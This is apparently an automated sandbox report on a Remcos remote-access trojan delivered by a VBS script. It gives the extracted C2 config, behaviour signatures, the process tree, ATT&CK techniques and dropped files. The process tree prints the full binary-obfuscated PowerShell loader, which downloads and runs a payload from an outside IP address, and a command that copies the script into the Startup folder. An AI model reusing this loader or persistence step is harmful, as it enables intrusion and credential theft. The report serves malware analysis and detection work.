Resubmissions

10-09-2022 11:44

220910-nwl3vsaag7 10

09-09-2022 16:16

220909-tq9vmageg6 10

Analysis

  • max time kernel
    150s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-09-2022 16:16

General

  • Target

    c1d6fcea01ed82777e63ebc9e6f085ce.vbs

  • Size

    2KB

  • MD5

    c1d6fcea01ed82777e63ebc9e6f085ce

  • SHA1

    5497cee7b0f9b4f7f81491779e88edd83f167a15

  • SHA256

    de7a6bf628cdb1265197ea78967808850230114acb014cd0a39aa36adf2832f7

  • SHA512

    d1ea396de7dc2204733d113e2fed0d89b93c61cf7165ff9798a858712a81c4d9ad6a78eb0f75271f9df9e590d85c9e328ee9ce1348d01c66e0a446cda8d07611

Malware Config

Extracted

Family

remcos

Botnet

AUGB22

C2

saptransmissions.dvrlists.com:55026

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    AUGB22

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    AUGB22-JJZGN0

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

  • take_screenshot_title

    wikipedia;solitaire;

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 2 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 4 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 30 IoCs
  • Suspicious behavior: EnumeratesProcesses 8 IoCs
  • Suspicious behavior: MapViewOfSection 4 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 44 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 34 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1588
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,00110001,00111001,00110010,00101110,00110010,00110001,00110000,00101110,00110010,00110100,00110000,00101110,00110001,00110000,00110001,00101111,01010110,01101001,01110011,01100001,00101111,01010000,01100001,01111001,01100001,01100010,01101100,01100101,01110011,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='I' + 'EX';sal P $o00;([system.String]::Join('', $gf))|P
      2⤵
      • Blocklisted process makes network request
      • Loads dropped DLL
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4076
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
        3⤵
        • Suspicious use of SetThreadContext
        • Suspicious behavior: MapViewOfSection
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2440
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\rtzapf"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1396
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\cvfsqyntq"
          4⤵
          • Accesses Microsoft Outlook accounts
          PID:2312
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\eqkdrqynmpmt"
          4⤵
            PID:4108
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\Admin\AppData\Local\Temp\eqkdrqynmpmt"
            4⤵
              PID:4912
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\c1d6fcea01ed82777e63ebc9e6f085ce.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c1d6fcea01ed82777e63ebc9e6f085ce.vbs'
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: RenamesItself
          • Suspicious use of AdjustPrivilegeToken
          PID:848
      • C:\Program Files (x86)\Internet Explorer\ielowutil.exe
        "C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding
        1⤵
          PID:4804
        • C:\Program Files\Internet Explorer\iexplore.exe
          "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
          1⤵
          • Modifies Internet Explorer settings
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:4228
          • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
            "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4228 CREDAT:17410 /prefetch:2
            2⤵
            • Modifies Internet Explorer settings
            • Suspicious use of SetWindowsHookEx
            PID:1988

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        Defense Evasion

        Modify Registry

        1
        T1112

        Credential Access

        Credentials in Files

        1
        T1081

        Discovery

        Query Registry

        1
        T1012

        System Information Discovery

        2
        T1082

        Collection

        Data from Local System

        1
        T1005

        Email Collection

        1
        T1114

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
          Filesize

          2KB

          MD5

          6cf293cb4d80be23433eecf74ddb5503

          SHA1

          24fe4752df102c2ef492954d6b046cb5512ad408

          SHA256

          b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

          SHA512

          0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

        • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\z2evvp3\imagestore.dat
          Filesize

          30KB

          MD5

          83c5fef64ce2d8c0357e0c82b90074ab

          SHA1

          2ec4ae628038493658f272c3224c864a6069769a

          SHA256

          86e2d9c27cfd153c08a7288281ba3b034c5c4af9d2b3426731185c920455d881

          SHA512

          c79df0506bfccaadf5cb46d5c02282ca5626277a65cc8350a668e9b00e344c92d13fa84408bbc7671405231aa6924621c9cccdc02a065dab458fb5cfd4ed1528

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
          Filesize

          1KB

          MD5

          2f1c34f5acc6c714151a2bb2b5c2a1e8

          SHA1

          b2b0978b44677380316be13b726bdd37b3e37a68

          SHA256

          c64007357c908e2f0a576c5e4150936773615ddfed17e51cf94d136ad01bf12f

          SHA512

          460c0518ce31f12294094b8f576f6bdb8405c0e1ca567cae78fb378cb41ba5e142917d89162316bf5546611f6d9deb916fc74c656656023c16367ec93bfc34d0

        • C:\Users\Admin\AppData\Local\Temp\2101ac6b-6b9b-440a-8e07-e6cc53c9bc33\AgileDotNetRT64.dll
          Filesize

          75KB

          MD5

          42b2c266e49a3acd346b91e3b0e638c0

          SHA1

          2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

          SHA256

          adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

          SHA512

          770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

        • C:\Users\Admin\AppData\Local\Temp\rtzapf
          Filesize

          4KB

          MD5

          d06ebab8b0513f602e535079a9ebbeea

          SHA1

          d29472e6eb5a72f0353d70b97a33337b255b487e

          SHA256

          0c9e16830ccc6495def187adde2137ac07a566e1534e5714f626dcd68d28094c

          SHA512

          002df6f401950fd24d5976a47c58e9e2c58cef7d4fdec69f815fb6a00fb1e1a8963a4a7bf52056e61d6f6875edec393c466742c3031dd5f88802b45ddadca209

        • memory/848-138-0x00007FFDE31F0000-0x00007FFDE3CB1000-memory.dmp
          Filesize

          10.8MB

        • memory/848-137-0x00007FFDE31F0000-0x00007FFDE3CB1000-memory.dmp
          Filesize

          10.8MB

        • memory/848-133-0x0000000000000000-mapping.dmp
        • memory/848-134-0x00000115BF130000-0x00000115BF152000-memory.dmp
          Filesize

          136KB

        • memory/1396-157-0x0000000000400000-0x0000000000478000-memory.dmp
          Filesize

          480KB

        • memory/1396-158-0x0000000000400000-0x0000000000478000-memory.dmp
          Filesize

          480KB

        • memory/1396-150-0x0000000000000000-mapping.dmp
        • memory/2312-154-0x0000000000400000-0x0000000000457000-memory.dmp
          Filesize

          348KB

        • memory/2312-151-0x0000000000000000-mapping.dmp
        • memory/2440-141-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2440-148-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2440-146-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2440-145-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/2440-142-0x00000000004327A4-mapping.dmp
        • memory/2440-156-0x0000000000400000-0x000000000047F000-memory.dmp
          Filesize

          508KB

        • memory/4076-136-0x00007FFDE31F0000-0x00007FFDE3CB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4076-149-0x00007FFDE31F0000-0x00007FFDE3CB1000-memory.dmp
          Filesize

          10.8MB

        • memory/4076-132-0x0000000000000000-mapping.dmp
        • memory/4076-140-0x00007FFDDE0C0000-0x00007FFDDE20E000-memory.dmp
          Filesize

          1.3MB

        • memory/4108-152-0x0000000000000000-mapping.dmp
        • memory/4912-153-0x0000000000000000-mapping.dmp
        • memory/4912-155-0x0000000000400000-0x0000000000424000-memory.dmp
          Filesize

          144KB